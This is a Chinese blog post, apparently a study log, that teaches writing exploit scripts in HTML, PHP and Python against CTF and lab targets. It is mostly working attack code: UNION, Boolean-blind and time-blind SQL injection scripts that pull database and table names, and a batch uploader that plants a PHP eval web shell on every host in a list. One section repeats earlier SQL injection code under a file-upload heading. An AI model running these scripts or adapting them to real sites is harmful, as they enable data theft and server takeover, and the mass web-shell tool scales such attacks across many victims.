【EXP编写】注入EXP的简单编写

前言

制作简单exp的学习记录

一、简单的HTML编写注入EXP

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>简单的HTML EXP编写</title>
</head>
<body>
	<form method="GET" action="http://ebc14e18-2cda-4cd7-b884-c4261c48768f.challenge.ctf.show:8080/">
		<input type="hidden" name="id" value="1.1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())#"/>
		<input type="submit" value="利用" />
	</form>
</body>
</html>

多增加一点，通过输入url来进行注入

<!DOCTYPE html>
<html>
<head>
	<script>
		function exploit() {
			var x  = document.getElementById("url").value
			var c  = document.getElementById("myform").action=x
			if(x){
				document.getElementById('myform').submit()
			}else{
				alert("请填写网址！")
			}
		}
	</script>
	<meta charset="utf-8">
	<title>简单的HTML EXP编写</title>
</head>
<body>
	<form id="myform">
		<input type="text" id="url" size="50px">
		<input type="hidden" name="id" value="1.1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())#"/>
		<input type="button" value="exploit" onclick="exploit()"/>
	</form>
</body>
</html>

二、简单的PHP编写注入EXP

fsockopen()将返回一个文件句柄，之后可以被其他文件类函数调用（例如：fgets()，fgetss()，fwrite()，fclose()还有feof()）。如果调用失败，将返回FALSE。

fsockopen是用来模拟发包的

<?php
$site="ebc14e18-2cda-4cd7-b884-c4261c48768f.challenge.ctf.show";
$payload="?id=1.1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23";

$fp = fsockopen($site, 8080, $errno, $errstr, 30);
if(!$fp){
	echo "$errstr ($errno)<br />\n";
} else{
	$out = "GET /{$payload} HTTP/1.1\r\n";
	$out .= "Host: {$site}:8080\r\n";
	$out .= "Connection: keep-alive\r\n\r\n";		
	fwrite($fp, $out);
	while (!feof($fp)){
		echo fgets($fp, 128);
	}
	fclose($fp);
}

?>

匹配你想要的结果

<?php
$n=0;
$site="ebc14e18-2cda-4cd7-b884-c4261c48768f.challenge.ctf.show";
$payload="?id=1.1%27%20union%20select%201,2,(select%20group_concat(%27~%27,table_name,%27~%27)%20from%20information_schema.tables%20where%20table_schema=database())%23";

$fp = fsockopen($site, 8080, $errno, $errstr, 30);
if(!$fp){
	echo "$errstr ($errno)<br />\n";
} else{
	$out = "GET /{$payload} HTTP/1.1\r\n";
	$out .= "Host: {$site}:8080\r\n";
	$out .= "Connection: keep-alive\r\n\r\n";		
	fwrite($fp, $out);
	while (!feof($fp)){
		$n += 1;
		$html = fgets($fp, 128);
		preg_match_all("/~(.*?)~/", $html, $hash);
		if($n==27){
			print_r($hash);
		}
	}

}
fclose($fp);

?>

三、简单的python编写注入EXP

利用正则

import requests
import re

#获取payload源码

url = "http://81426808-4f66-48bf-84f4-327b8ba4b8c2.challenge.ctf.show:8080/"
def get_result(url):
    payload = "id=1.1%27%20union%20select%201,2,(select%20group_concat(%27~%27,table_name,%27~%27)%20from%20information_schema.tables%20where%20table_schema=database())%23"
    res = requests.get(url,payload)
    result = re.findall('~(.*?)~',res.text)
    return result
print('.'.join(get_result(url)))

四、POST的exp编写

python写法

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/27
# blog: gylq.gitee.io

import requests
import re

#获取payload源码
url = "http://inject2.lab.aqlab.cn:81/Pass-05/index.php"
payload = "' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 #"

def get_result(url):
    data = {
        'username' : payload,
        'password' : '1'
    }
    res = requests.post(url,data)
    result = re.findall('Your Login(.*?)<br>Your Password',res.text)
    return result
print('.'.join(get_result(url)))

PHP写法

<?php
/**
 *  模拟post进行url请求
 *  @param string $url
 * 	@param array $post_data
 */
	$url='http://inject2.lab.aqlab.cn:81/Pass-05/index.php';
	function request_post($url = '', $post_data = array()) {
		if (empty($url) || empty($post_data)){
			return false;
		}
		$o = "";
		foreach ($post_data as $k => $v ) {
			$o .= "$k=".urlencode($v)."&";
		}
		$post_data =substr($o,0,-1);
		$postUrl = $url;
		$curlPost = $post_data;
		$ch = curl_init(); //初始化curl
		curl_setopt($ch, CURLOPT_URL, $postUrl); // 抓取指定网页
		curl_setopt($ch, CURLOPT_HEADER, 0); // 设置header
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 要求结果为字符串并且输出到屏幕上
		curl_setopt($ch, CURLOPT_POST, 1); //post提交方式
		curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
		$data = curl_exec($ch); //运行curl
		curl_close($ch);

		return $data;
	}
	$post_data = array("username"=>"' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 #","password"=>"1","submit"=>"%E7%99%BB%E5%BD%95");
	$html=request_post($url,$post_data);
	preg_match('/Your Login(.*?)Yo/',$html, $match);
	echo join($match);

?>

五、文件上传getshell，php写法

<?php
/**
 *  模拟post进行url请求
 *  @param string $url
 * 	@param array $post_data
 */
	$url='http://inject2.lab.aqlab.cn:81/Pass-05/index.php';
	function request_post($url = '', $post_data = array()) {
		if (empty($url) || empty($post_data)){
			return false;
		}
		$o = "";
		foreach ($post_data as $k => $v ) {
			$o .= "$k=".urlencode($v)."&";
		}
		$post_data =substr($o,0,-1);
		$postUrl = $url;
		$curlPost = $post_data;
		$ch = curl_init(); //初始化curl
		curl_setopt($ch, CURLOPT_URL, $postUrl); // 抓取指定网页
		curl_setopt($ch, CURLOPT_HEADER, 0); // 设置header
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 要求结果为字符串并且输出到屏幕上
		curl_setopt($ch, CURLOPT_POST, 1); //post提交方式
		curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
		$data = curl_exec($ch); //运行curl
		curl_close($ch);

		return $data;
	}
	$post_data = array("username"=>"' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 #","password"=>"1","submit"=>"%E7%99%BB%E5%BD%95");
	$html=request_post($url,$post_data);
	preg_match('/Your Login(.*?)Yo/',$html, $match);
	echo join($match);

?>

六、文件上传批量getshell，php写法

<?php


# 命令行参数>3
if(count($argv)<3){
	print "\r\n\tUse Examply： ".$argv[0]." url.txt save.txt\r\n";
	exit;
}


# 发包返回html页面
function http_send($host, $packet){

	#echo "\n\r\nRequest:\n".$packet;
	$sock = fsockopen($host, 8080);

	if(!$sock){
		print "\n[-] No response from {$host}:8080 Trying again...";
		$sock = fsockopen($host, 8080);
	}
	fwrite($sock, $packet);
	while (!feof($sock)) {
	
		$resp=fread($sock,1024);
	}
	fclose($sock);
	return $resp;


}

# burp抓的包进行写入
function data($host,$filename){

	$payload .= "------WebKitFormBoundaryF1mJrJElc0yUu1HA\r\n";
	$payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
	$payload .= "Content-Type: image/png\r\n\r\n";
	$payload .= 'GIF89a'."\r\n".'<?php eval($_REQUEST[shell])?>'."\r\n\r\n";
	$payload .= "------WebKitFormBoundaryF1mJrJElc0yUu1HA--\r\n";
	$packet = "POST /upload.php HTTP/1.1\r\n";
	$packet .= "Host: {$host}:8080\r\n";
	$packet .= "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF1mJrJElc0yUu1HA\r\n";
	$packet .= "Content-Length: ".strlen($payload)."\r\n";
	$packet .= "Connection: close\r\n\r\n";
	$packet .= $payload;

	return $packet;
}

# 调用发包
function exploit($host){
	$filename = "b.php";
	$hosts = "{$host}";
	$packet=data($hosts,$filename);
	$html=http_send($hosts,$packet);
	preg_match_all('/msg\":\"(.*?)\"/',$html,$match);
	return $match[0];
}

# 将结果输入到文件中
function w($fileName,$data){
	fwrite(fopen($fileName,"a+"),$data."\r\n");
}

$url_txt = $argv[1];

$myurl = file($url_txt);

$save_file = $argv[2];

# 将数组遍历出来
foreach ($myurl as $value) {
		#echo "Testing {$value}\r\n";
		$v=substr($value,strpos($value,"//")+2);  
		$v=trim(str_replace("/", "", $v));
		$html=exploit($v);
		$result = "http://{$v}:8080/".trim(str_replace("\"","",substr($html[0],strpos($html[0],":")+2)));
		echo "\r\n".$result;
		w($save_file,$result);
		sleep(1);
	}

print "\r\n\r\n[+]-----------------------------WIN--------------------\r\n\r\n";
print "Save complete in {$save_file}\r\n\r\n";

// print "\n\r\n\nResponse:\n".$html."\r\n";
// print "\r\n\r\n[+]----------------------------Result-------------------------------\r\n";
// preg_match_all('/msg\":\"(.*?)\"/',$html,$match);
// echo "\r\n\r\n".join($match[0])."\r\n";
// if ($match[0]){
// print "\r\n\r\n[+]-----------------------------WIN---------------------------------\r\n";
// }else{
// 	print "\r\n\r\n[+]----------------------------FAILED-------------------------------\r\n";
// }
?>

七、布尔盲注python写法

python写法

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time
url = "http://www.moonteamweb.com/mysqlinj.php?id="
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagbab'"
#--------查flag
#sql= "select flag4sa from ctfshow.flagbab"
#*************************************************************************************************************************************************************
payload = "1 and if(ascii(substr(({}),{},1))>'{}',1,0)"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        params=payload.format(sql,i,mid)
        res = requests.get(url+params)
        if "所谓SQL注入" in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

八、时间盲注python写法

python写法

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time
url = "http://www.web15.com/mysqlinj.php?id="
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagbab'"
#--------查flag
#sql= "select flag4sa from ctfshow.flagbab"
#*************************************************************************************************************************************************************
payload = '1 or if(ascii(substr(({}),{},1))>"{}",sleep(1.5),1) '
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        params=payload.format(sql,i,mid)
        start = time.time()
        res = requests.get(url+params)
        end = time.time()
        print(end -start)
        if end-start > 1.4:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

我的个人博客

孤桜懶契：http://gylq.gitee.io